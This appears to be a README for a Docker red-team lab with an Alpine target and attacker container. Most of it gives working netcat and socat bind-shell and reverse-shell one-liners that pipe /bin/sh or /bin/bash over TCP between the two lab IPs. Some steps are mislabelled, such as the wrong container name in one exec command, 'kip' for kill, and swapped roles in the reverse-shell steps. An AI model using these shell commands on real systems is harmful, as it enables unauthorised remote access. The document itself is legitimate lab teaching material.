Setup containers using Alpine Linux as target and attacker for red-team exercises.
- The target has an IP address of
172.24.0.2
. - The attacker has an IP address of
172.24.0.3
. - The target and attack have ports 5009 expoed for
tcp
andudp
. - Port
5010
is exposed on the target and port5011
is exposed on attacker to the host.
The static IP address for the containers can be removed for nmap
practice. Install aother tools as needed in the Dockerfile
for each image.
Build and run the containers. They will stay running in the shell you're using.
docker-compose up
Open a new terminal and setup on target
container:
docker exec -it target /bin/bash
Open a new terminal and setup on attacker
container:
docker exec -it target /bin/bash
Have the attacker connect to the target.
Everybody's go-to. Instructions below are for the neutered netcat-openbsd
version.
Setup listener target
:
mkfifo f
nc -l -p 5009 0<f | /bin/bash > f 2>&1
On attacker
container, connect to target
:
nc 172.24.0.2 5009 -vvv
Socat is a better option since you can use history and encryption with tty
. Target machine is likely going to have netcat installed, but once a shell session is establed, you can install other tools.
Find the target
ip address and setup listener:
socat TCP-LISTEN:5009,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
On attacker
container interactive bash, connect to the target
:
socat FILE:`tty`,raw,echo=0 TCP4:172.24.0.2:5009
Stop connection with exit
on attacker
.
Have the target connect to the attacker. Circumvents inbound firewall rules.
On the attacker
setup listener:
rm -f f 2> /dev/null
mkfifo f
cat f | /bin/sh -i 2>&1 | nc 172.24.0.3 5009 > f
OR
nc 172.24.0.3 5009 0<f | /bin/sh -i 2>&1 | tee f
On target
container interactive bash, connect to the attacker:
nc -lvnp 5009 -vvv
Setup listener on the attacker
:
socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:5009
On target
container interactive bash, connect to the attacker.:
socat TCP:172.24.0.3:5009 EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane
Stop connection with exit
on attacker
.
On the docker-compose terminal press ctrl+c
to stop the running containers.
docker-compose down
docker-compose --verbose up
Show running container IP addresse from host:
docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container_name>
Show IP address from running container:
hostname -i
List running procees:
ps
Kill specified process ID. You may need to do this for already running listeners.
kip <pid>
If you get connection refused
, make sure your listener is running.
This is for educational purposes. Do not attack unauthorized systems.